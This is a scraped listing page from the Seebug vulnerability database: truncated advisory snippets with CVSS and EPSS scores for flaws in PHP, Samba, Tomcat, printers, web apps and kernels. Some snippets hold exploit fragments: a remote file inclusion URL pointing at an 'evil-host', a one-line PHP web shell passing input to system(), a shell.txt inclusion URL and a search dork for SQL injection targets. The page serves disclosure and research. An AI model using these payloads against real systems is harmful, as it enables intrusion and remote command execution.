Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2012/11/30 12:0 a.m.79 views

Samsung 打印机固件管理账号后门

BUGTRAQ ID: 56692 CVECAN ID: CVE-2012-4964 Samsung是韩国三星电子,成立于1969年。 Samsung打印机及某些三星产的Dell打印机包含硬编码的完全读写权限的SNMP community string,即使在打印机管理程序中禁用SNMP,此字符串也是有效的,导致远程攻击者可完全控制受影响设备。2012年10月31日后的发布的模块不受此漏洞的影响。 利用该漏洞,一个远端的未授权的攻击者可以1 以管理权限访问受影响设备 (2)修改受影响设备的配置、访问敏感资源 (3) 代码执行 有报告称已有发布工具利用该漏洞。 0 Samsung...

7.5CVSS6.4AI score0.08015EPSS
Exploits1
seebug.org
seebug.org
added 2011/06/27 12:0 a.m.79 views

Apple Mac OS X 10.6.8之前版本存在多个安全漏洞

Bugtraq ID: 48412 CVE ID:CVE-2011-0196 CVE-2011-0197 CVE-2011-0198 CVE-2011-0199 CVE-2011-0200 CVE-2011-0201 CVE-2011-0202 CVE-2011-0203 CVE-2011-0204 CVE-2011-0205 CVE-2011-0206 CVE-2011-0207 CVE-2011-0208 CVE-2011-0209 CVE-2011-0210 CVE-2011-0211 CVE-2011-0212 CVE-2011-0213 CVE-2011-1132 Apple...

7.8CVSS8.3AI score0.03903EPSS
Exploits3
seebug.org
seebug.org
added 2011/03/27 12:0 a.m.79 views

PHP "Zip"扩展"stream_get_contents()"函数拒绝服务漏洞

BUGTRAQ ID: 46969 CVE ID: CVE-2011-1470 PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP "Zip"扩展"streamgetcontents"函数在实现上存在拒绝服务漏洞,远程攻击者可利用此漏洞造成应用程序崩溃,拒绝服务和任意代码执行。 MandrakeSoft Corporate Server 4.0 x8664 MandrakeSoft Corporate Server 4.0 PHP PHP 5.x 厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

4.3CVSS9.2AI score0.09521EPSS
Exploits2
seebug.org
seebug.org
added 2010/04/12 12:0 a.m.79 views

VMware VMnc编解码器HexTile编码视频块多个堆溢出漏洞

BUGTRAQ ID: 39364 CVE ID: CVE-2009-1565 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。 VMWare媒体解码器包含有用于播放VMware Workstation、VMware Player和VMware ACE所记录电影的VMnc媒体编解码器。vmnc.dll库在处理HexTile编码的视频块时存在两个整数截尾错误,用户受骗打开了畸形的AVI媒体文件就可以触发堆溢出,导致执行任意代码。 VMWare Workstation 6.5.x VMWare Player 2.5.x VMWare...

9.3CVSS6.4AI score0.0621EPSS
Exploits1
seebug.org
seebug.org
added 2010/01/16 12:0 a.m.79 views

Linux Kernel 'fasync_helper()'本地特权提升漏洞

Bugraq ID: 37806 CVE ID:CVE-2009-4141 Linux是一款开放源代码的操作系统。 Linux内核处理锁定fasync文件描述符存在安全漏洞,允许攻击者以内核特权执行任意代码或使系统崩溃。 根据Linus分析,“问题是相同文件描述符可在多个fasync列表上,它可以在特定fasync列表上存在一次,但是文件锁定比较特殊,会使用 'fl-flfasync'列表无视在什么底层设备驱动或其他的情况下增加任意文件到它所属的fasync列表中。" 这个问题是因为它不正确假定某个文件只能在一个fasync列表中,所以fasynchelper会清除FASYNC标记。...

7.2CVSS0.00979EPSS
Exploits2
seebug.org
seebug.org
added 2009/12/21 12:0 a.m.79 views

PHPhotoalbum Remote File Upload Vulnerability

No description provided by source. || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ \ | | \ \ /\ /\ \ \ \ /...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/11/30 12:0 a.m.79 views

PHP proc_open()绕过safe_mode_protected_env_var限制漏洞

BUGTRAQ ID: 37138 CVE ID: CVE-2009-4018 PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP没有执行任何检查便允许传送对procopen所指定的环境变量,这就忽略了safemodeallowedenvvars和safemodeprotectedenvvars设置。用户可以绕过safemode限制访问Apache UID可访问的任意文件。 PHP 5.3.x 厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

7.5CVSS6.3AI score0.11341EPSS
Exploits5
seebug.org
seebug.org
added 2009/07/24 12:0 a.m.79 views

Mozilla Firefox MFSA存在多个安全漏洞

Bugraq ID: 35758 CVE ID:CVE-2009-1194 CVE-2009-2462 CVE-2009-2463 CVE-2009-2464 CVE-2009-2465 CVE-2009-2466 CVE-2009-2467 CVE-2009-2468 CVE-2009-2469 CVE-2009-2471 CVE-2009-2472 CNCVE ID:CNCVE-20091194 CNCVE-20092462 CNCVE-20092463 CNCVE-20092464 CNCVE-20092465 CNCVE-20092466 CNCVE-20092467...

10CVSS7.1AI score0.1323EPSS
Exploits4
seebug.org
seebug.org
added 2009/06/09 12:0 a.m.79 views

Apache APR-util库apr_strmatch_precompile()函数整数下溢漏洞

BUGTRAQ ID: 35221 CVECAN ID: CVE-2009-0023 Apr-util是Apache所使用的Apache可移植运行时工具库。 Apr-util库的strmatch/aprstrmatch.c文件中的aprstrmatchprecompile函数存在整数下溢漏洞。如果远程攻击者通过.htaccess文件、moddavsvn模块中的SVNMasterURI指令、modapreq2模块或libapreq2 库等方式传送了特制输入的话,就可能导致守护程序崩溃。 APR-util 1.3.4 厂商补丁: Apache Group ------------...

4.3CVSS0.1AI score0.0853EPSS
Exploits1
seebug.org
seebug.org
added 2008/11/03 12:0 a.m.79 views

YourFreeWorld Downline Builder (id) Remote SQL Injection Vulnerability

No description provided by source. Downline Builder id Remote SQL Injection Vulnerability Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc script : http://www.yourfreeworld.com/script/downlinebuilder.php DorK : inurl:tr.php?id= Downline Exploit :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/08/04 12:0 a.m.79 views

Apache Tomcat HttpServletResponse.sendError()跨站脚本漏洞

BUGTRAQ ID: 30496 CVECAN ID: CVE-2008-1232 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 Apache Tomcat不仅在错误页面中显示了HttpServletResponse.sendError调用的消息参数,同时也在HTTP响应的reason-phrase中使用,这就可能在HTTP头中包含非法字符。特制的消息可能导致跨站脚本攻击,向HTTP响应中注入任意内容。 Apache Group Tomcat 6.0.x Apache Group Tomcat 5.5.x Apache Group Tomcat 4.1.x...

4.3CVSS5.3AI score0.75865EPSS
Exploits2
seebug.org
seebug.org
added 2007/09/12 12:0 a.m.79 views

Samba NSS_Info插件本地权限提升漏洞

BUGTRAQ ID: 25636 CVECAN ID: CVE-2007-4138 Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。 idmapad.so库中为Winbind提供了nssinfo扩展用于从活动目录域控制台检索用户的主目录路径、登录shell和主组id等,可通过将winbind nss info的smb.conf选项定义为sfu或rfc2307来启用这个功能。 Windows的Identity Management for Unix和Services for Unix...

6.9CVSS0.9AI score0.00724EPSS
Exploits1
seebug.org
seebug.org
added 2007/05/13 12:0 a.m.79 views

Beacon 0.2.0 (splash.lang.php) Remote File Inclusion Vulnerability

No description provided by source. Beacon = 2.0Remot file inclusion languagePath Download script : http://download.savannah.gnu.org/releases/beacon/beacon020.zip Thanks Str0ke Exploit: http://victime.com/pbeaconpath/beacon/language/1/splash.lang.php?languagePath=shell.txt? Discovered by ThE TiGeR...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/03 12:0 a.m.79 views

PHP Msg_Receive()内存分配整数溢出漏洞

BUGTRAQ ID: 23236 PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP的msgreceive函数实现上存在整数溢出漏洞,本地攻击者可能利用此漏洞提升自己的权限。 PHP的msgreceive函数没有对maxsize参数执行任何检查便直接在内存分配中使用,导致整数溢出。有漏洞的代码如下: PHPFUNCTIONmsgreceive ... if zendparseparametersZENDNUMARGS TSRMLSCC, "rlzlz|blz", &queue, &desiredmsgtype, &outmsgtype,...

6.7AI score
Exploits0
seebug.org
seebug.org
added 2007/04/03 12:0 a.m.79 views

PHP Str_Replace()整数溢出漏洞

PHP是一款广泛使用的WEB开发脚本语言。 PHP strreplace内存分配存在整数溢出,远程攻击者可利用此漏洞以应用程序进程权限执行任意指令。 当strreplace调用后,代码会根据搜索路径长度切换到两个不同代码路径。单个字符搜索字符串会又不同函数处理,因为这可导致效率更高。有效方法部分代码如下: ZSTRLENPresult = len + charcount tolen - 1; ZSTRVALPresult = target = emallocZSTRLENPresult + 1; ZTYPEPresult = ISSTRING;...

6.8AI score
Exploits0
seebug.org
seebug.org
added 2006/12/08 12:0 a.m.79 views

Metyus Okul Yonetim Sistemi Uye_giris_islem.ASP SQL注入漏洞

Metyus Okul Yonetim Sistemi是一款基于ASP的WEB应用程序。 Metyus Okul Yonetim Sistemi不充分过滤用户提交的URI输入,远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息。 问题是'Uyegirisislem.ASP'脚本对用户提交的WEB参数缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息。 MaxiASP Yonetimi 1.0 http://www.maxiasp.com/scriptler.asp?ktno=1 titleRemote Admin Attack - LiderHack.Or...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/11/02 12:0 a.m.79 views

TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability

No description provided by source. /==========================================/ //tikiwiki version 1.9.5 CVS -Sirius- PoC // Product: Tikiwiki // URL: http://tikiwiki.org/ // RISK: critical /==========================================/ there's a critical security bug in tikiwiki version 1.9.5 CVS...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2021/05/26 12:0 a.m.78 views

SolarWinds Orion 远程代码执行漏洞(CVE-2021-31474)

...

10CVSS1.4AI score0.94431EPSS
Exploits1
seebug.org
seebug.org
added 2018/06/22 12:0 a.m.78 views

Insteon Hub PubNub control Channel Message Handler Code Execution Vulnerabilities(CVE-2017-14452~CVE-2017-14455)

Summary Multiple exploitable buffer overflow vulnerabilities exists in the PubNub message handler for the "control" channel of Insteon Hub running firmware version 1012. Specially crafted replies received from the PubNub service can cause buffer overflows on a global section overwriting arbitrary...

9.2AI score0.01879EPSS
Exploits2
seebug.org
seebug.org
added 2018/05/10 12:0 a.m.78 views

Seagate Personal Cloud Multiple Vulnerabilities(CVE-2018-5347)

Vulnerabilities summary The following advisory describes two 2 unauthenticated command injection vulnerabilities. Seagate Personal Cloud Home Media Storage is “the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.” Credit An independent...

10CVSS10AI score0.54163EPSS
Exploits4
seebug.org
seebug.org
added 2018/02/24 12:0 a.m.78 views

Windows: Global Reparse Point Security Feature Bypass/Elevation of Privilege(CVE-2018-0822)

Windows: Global Reparse Point Security Feature Bypass/Elevation of Privilege Platform: Windows 10 1709 functionality not present prior to this version Class: Security Feature Bypass/Elevation of Privilege Summary: It’s possible to use the new Global Reparse Point functionality introduced in Windo...

7.3AI score0.02683EPSS
Exploits3
seebug.org
seebug.org
added 2017/10/12 12:0 a.m.78 views

LibTIFF PixarLogDecode Remote Code Execution Vulnerability(CVE-2016-5875)

Summary An exploitable heap based buffer overflow exists in the handling of compressed TIFF images in LibTIFF's PixarLogDecode api. A crafted TIFF document can lead to a heap based buffer overflow resulting in remote code execution. The vulnerability can be triggered through any user controlled...

9.3AI score
Exploits1
seebug.org
seebug.org
added 2017/08/08 12:0 a.m.78 views

Synology Photo Station Unauthenticated Remote Code Execution

Vulnerability Summary The following advisory describes a Remote Code Execution found in Synology Photo Station versions 6.7.3-3432 and earlier / 6.3-2967 and earlier. Personal Photo Station is an online photo album with blog owned and managed by a DSM user. Synology NAS provides the home/photo...

7.5CVSS9AI score0.44573EPSS
Exploits4
seebug.org
seebug.org
added 2017/07/27 12:0 a.m.78 views

Microsoft Windows Kernel Local Information Disclosure Vulnerability(CVE-2017-8564)

We have discovered that the handler of the 0x120007 IOCTL in nsiproxy.sys \.\Nsi device discloses portions of uninitialized pool memory to user-mode clients, likely due to output structure alignment holes. On our test Windows 7 32-bit workstation, an example layout of the output buffer is as...

2.1CVSS7.4AI score0.03018EPSS
Exploits3
seebug.org
seebug.org
added 2017/07/01 12:0 a.m.78 views

systemd CVE-2017-9445 Out-Of-Bounds Write Remote Code Execution Vulnerability

Vulnerability description Canonical's Ubuntu developer Chris Coulson found a critical vulnerability, you can use it to remotely attack run popular of the operating system of the machine. The vulnerability number CVE-2017-9445 located in the Systemd init system and service manager . A remote...

5CVSS8.3AI score0.55116EPSS
Exploits1
seebug.org
seebug.org
added 2017/04/21 12:0 a.m.78 views

Chrome Universal XSS via reentrancy in FrameLoader::startLoad (CVE-2016-1697)

VULNERABILITY DETAILS From /thirdparty/WebKit/Source/core/loader/FrameLoader.cpp: void FrameLoader::startLoad... ASSERTclient-hasWebView; if mframe-document-pageDismissalEventBeingDispatched != Document::NoDismissal return; ... mframe-document-cancelParsing;...

6.8CVSS8.5AI score0.01849EPSS
Exploits1
seebug.org
seebug.org
added 2017/04/09 12:0 a.m.78 views

Xen: broken check in memory_exchange() permits PV guest breakout(CVE-2017-7228)

Detailed analysis: Pandavirtualization: Exploiting the Xen hypervisor This bug report describes a vulnerability in memoryexchange that permits PV guest kernels to write to an arbitrary virtual address with the hypervisor privileges. The vulnerability was introduced through a broken fix for...

7.2CVSS7AI score0.01569EPSS
Exploits4
seebug.org
seebug.org
added 2017/04/07 12:0 a.m.78 views

QNAP QTS multiple RCE vulnerabilities (CVE-2017-6361, CVE-2017-6360, CVE-2017-6359)

QNAP QTS multiple RCE vulnerabilities The latest version of this advisory is available at: https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt Overview -------- QNAP QTS firmware contains multiple Command Injection CWE-77 vulnerabilities that can be exploited to gain remote...

10CVSS10.9AI score0.66146EPSS
Exploits5
seebug.org
seebug.org
added 2017/04/06 12:0 a.m.78 views

AMF3 Java implementations deserialization Vulnerability

Details reference: https://codewhitesec.blogspot.kr/2017/04/amf.html Some Java implementations of AMF3 deserializers derive class instances from java. io. Externalizable rather than the AMF3 specification's recommendation of a flash. utils. IExternalizable. A remote attacker with the ability to...

7.5CVSS9.6AI score0.16239EPSS
Exploits5
seebug.org
seebug.org
added 2016/12/08 12:0 a.m.78 views

Roundcube 1.2.2: Command Execution via Email

中文分析:http://paper.seebug.org/138/ Author: p0wd3r, LG 知道创宇404安全实验室 Roundcube is a widely distributed open-source webmail software used by many organizations and companies around the globe. The mirror on SourceForge, for example, counts more than 260,000 downloads in the last 12 months1 which is on...

6CVSS8.2AI score0.05621EPSS
Exploits2
seebug.org
seebug.org
added 2016/03/06 12:0 a.m.78 views

TurboGate邮件网关漏洞合集

简要描述: 拓波软件旗下另一款产品,用户量还是挺大的。 详细说明: TurboGate其实相当于TurboMail的早期版本,TurboGate集成了大量的在TurboMail中出现的漏洞。 这里只列出无需登录即可利用的漏洞,厂商可以根据TurboMail漏洞进行自查。 1. http://.../bugs/wooyun-2016-0167905 在TurboGate中使用的是axis2%remote; $alpharand g00dPa$$w0rD $alpharand 1 1 https://images.seebug.org/upload/201603/052322256...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/09 12:0 a.m.78 views

EWEBS应用虚拟化系统的文件casmain.xgi存在任意系统文件读取漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/12/17 12:0 a.m.78 views

华夏创新 LotApp LotBalance LotWan LotServer 命令执行&SQL注入 漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/05/04 12:0 a.m.78 views

金蝶企业移动管理云暴力破解+弱口令

简要描述: 如题,金蝶企业移动管理云暴力破解+弱口令,未加验证码和默认口令 详细说明: 问题网址:http://mcloud.kingdee.com/mcloud/pages/ POST /mcloud/dwr/call/plaincall/custLoginService.login.dwr HTTP/1.1 Host: mcloud.kingdee.com Proxy-Connection: keep-alive Content-Length: 301 Origin: http://mcloud.kingdee.com User-Agent: Content-Type:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/11/13 12:0 a.m.78 views

Joomla Akeeba Kickstart Unserialize Remote Code Execution

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rex/zip' require 'json' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include...

7.5CVSS6.5AI score0.55126EPSS
Exploits6
seebug.org
seebug.org
added 2014/10/24 12:0 a.m.78 views

TinyRise最新版前台任意文件包含漏洞

简要描述: TinyRise最新版20140926任意文件包含漏洞,一定条件下,可getshell 详细说明: 漏洞发生在framework/web/controller/Controllerclass.php文件的renderExecute函数: renderExecute函数存在extract变量覆盖,关键代码如下: public function renderExecute$runfile0123456789,$data0123456789 ...//省略无关代码 if$datas0123456789!==null extract$datas0123456789;...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/22 12:0 a.m.78 views

Linux Kernel ptrace/sysret - 本地提权漏洞

No description provided by source. / CVE-2014-4699 ptrace/sysret PoC by Vitaly Nikolenko [email protected] gcc -O2 pocv0.c This code is kernel specific. On Ubuntu 12.04.0 LTS 3.2.0-23-generic, the following will trigger the GP in sysret and overwrite the PF handler so we can land to our NOP sled...

6.9CVSS7.3AI score0.02324EPSS
Exploits6
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.78 views

ocPortal 1.0.3 - Remote File Inclusion

No description provided by source. http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. ?php $com = $GETcom; system $com; ? Example of funcs.php if your host support php. ?php echo '?ph...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.78 views

Plone and Zope Remote Command Execution PoC

BUGTRAQ ID: 49857 CVE ID: CVE-2011-3587 Zope是一个开源的web应用服务器,主要用python写成 Zope在实现上存在远程命令执行漏洞,非法攻击者可利用此漏洞部署特制的Web请求并以Zope/Plone服务权限执行任意命令 0 Zope 2.13.9 Zope 2.13.8 Zope 2.13 Zope 2.12.19 Zope 2.12 Plone 4.x 厂商补丁: Zope ---- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.zope.org/ Exploit Title: Plone -...

9.3CVSS6.4AI score0.78546EPSS
Exploits15
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.78 views

Samba nttrans Reply - Integer Overflow Vulnerability

No description provided by source. Exploitation: samba nttrans reply integer overflow / \ / \ | || | | | \ / / . || | | | / | / / | || || //\ // / | CVE-2013-4124 samba integer overflow in nttrans reply reading ealist vulnerable samba daemon has a integer overflow to cause remote dos by...

5CVSS0.6AI score0.69008EPSS
Exploits7
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.78 views

Ammyy Admin 3.2 - Authentication Bypass

No description provided by source. Title: ==== Ammyy Admin - Hidden hard-coded option and Access Control vulnerability. Credit: ====== Name: Bhadresh Patel Company/affiliation: Cyberoam Technologies Private Limited Website: www.cyberoam.com CVE: ==== - CVE-2013-5581 for hidden hard-coded option...

5.5CVSS7.6AI score0.03636EPSS
Exploits5
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.78 views

PHP <= 5.3.6 shmop_read() Integer Overflow DoS

No description provided by source. ?php Exploit Title: PHP =5.3.5 Integer Overflow DoS Date: 12-03-11 Author: Jose Carlos Norte - www.rooibo.com Software Link: www.php.net Version: = 5.3.5 Tested on: Ubuntu Linux CVE : CVE-2011-1092 $shmkey = ftokFILE, 't'; $shmid = shmopopen$shmkey, c, 0644, 100...

7.5CVSS0.5AI score0.17881EPSS
Exploits5
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.78 views

Adobe Acrobat Reader 7-9 - U3D BoF

No description provided by source. Copyright c 2009, Felipe Andres Manzano [email protected] All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source...

9.3CVSS8.8AI score0.18445EPSS
Exploits9
seebug.org
seebug.org
added 2013/06/11 12:0 a.m.78 views

PHP &quot;php_quot_print_encode()&quot;缓冲区溢出漏洞(CVE-2013-2110)

Bugtraq ID:60411 CVE ID:CVE-2013-2110 PHP是一种HTML内嵌式的语言。 "phpquotprintencode"函数ext/standard/quotprint.c在解析字符串时存在一个基于堆的缓冲区溢出,允许攻击者利用此漏洞以应用程序上下文执行任意代码。 此外在解析MP3文件的MIMETYPE时存在一个安全问题,可导致PHP 5.4.15版本崩溃。 0 PHP 5.3.x PHP 5.4.x 厂商解决方案 PHP 5.4.16或5.3.26已经修复此漏洞,建议用户下载更新: http://www.php.net/...

5CVSS5.7AI score0.06748EPSS
Exploits1
seebug.org
seebug.org
added 2012/07/20 12:0 a.m.78 views

Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; Exploit Title: SimpleWebServer 2.2-rc2 - Remote Buffer Overflow Exploit Date: 19/07/2012 Author: mr.pr0n @pr0n Homepage: http://ghostinthelab.wordpress.com/ Software Link: http://www.pmx.it/download/sws-2.2-rc2-i686.exe Version: 2....

7.1AI score
Exploits0
seebug.org
seebug.org
added 2011/11/28 12:0 a.m.78 views

TinyMCE / flvPlayer Cross Site Scripting / Disclosure

No description provided by source. I want to warn you about multiple vulnerabilities in TinyMCE and flvPlayer and hundreds of web applications and tens millions of web sites. These are Full path disclosure, Content Spoofing and Cross-Site Scripting vulnerabilities in TinyMCE CS and XSS are in...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2010/04/12 12:0 a.m.78 views

VMware VMnc编解码器HexTile编码视频块解析堆溢出漏洞

BUGTRAQ ID: 39363 CVE ID: CVE-2009-1564 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。 VMWare媒体解码器包含有用于播放VMware Workstation、VMware Player和VMware ACE所记录电影的VMnc媒体编解码器。vmnc.dll库在处理HexTile编码的视频块时缺少输入检查,用户受骗打开了畸形的AVI文件就可以触发堆溢出,导致执行任意代码。 VMWare Workstation 6.5.x VMWare Player 2.5.x VMWare Server...

9.3CVSS6.4AI score0.0621EPSS
Exploits1
seebug.org
seebug.org
added 2009/06/22 12:0 a.m.78 views

多个浏览器HTTPS内容上下文中的HTTP资源安全绕过漏洞

Bugraq ID: 35403 CVE ID:CVE-2009-2065 CVE-2009-2064 CVE-2009-2066 CVE-2009-2067 CNCVE ID:CNCVE-20092065 CNCVE-20092064 CNCVE-20092066 CNCVE-20092067 当页面通过不安全方法对安全内容请求资源进行操作时不正确显示警告,可导致绕过多个WEB浏览器安全限制。 攻击者可以利用这个漏洞进行钓鱼攻击或获得敏感信息。不过要利用此漏洞,攻击者必须截获或控制网络通信,如通过中间人,DNS毒药等攻击。 如下浏览器受此漏洞影响: Microsoft Internet...

6.8CVSS8.6AI score0.04273EPSS
Exploits1
seebug.org
seebug.org
added 2008/10/25 12:0 a.m.78 views

perlshop.cgi远程执行任意命令程序

BugCVE: CAN-1999-1374 perlshop.cgi是一个用Perl编写的基于Web的在线购物程序。perlshop.cgi实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在主机上以Web进程的权限执行任意命令。 有问题的代码在这里:open MAIL, |$blatloc - -t $to -s $subject || &errtrap Can t open $blatloc!\n $blatloc定义的是NT下的一个命令行发信程序blat,$to是用户输入的邮件地址,程序中没有过滤“|&”等特殊字符,入侵者可以在邮件地址中插入系统命令。 3.1 临时解决方法:...

5CVSS6.5AI score0.01936EPSS
Exploits1
seebug.org
seebug.org
added 2008/10/25 12:0 a.m.78 views

Count.cgi(wwwcount)远程缓冲区溢出漏洞

BugCVE: CVE-1999-0021 BUGTRAQ: 128 Count.cgi wwwcount是一个非常流行的Web站点跟踪统计CGI程序。一般它作为Web页面点击数统计。1997年10月,这个程序被发现了两个远程漏洞。第一个漏洞比较轻微,它能允许远程用户浏览到受限制的.GIF文件,可能泄漏.GIF文件里潜在的敏感数据。 第二个漏洞比较严重,count.cgi程序在处理QUERYSTRING环境变量的时候存在缓冲区溢出漏洞。远程攻击者可以发送一个超长的请求给程序就能进行溢出攻击,以Web用户的权限在系统执行任意命令。 2.3 Muhammad A. Muquit...

7.5CVSS6.6AI score0.2667EPSS
Exploits1
Total number of security vulnerabilities5000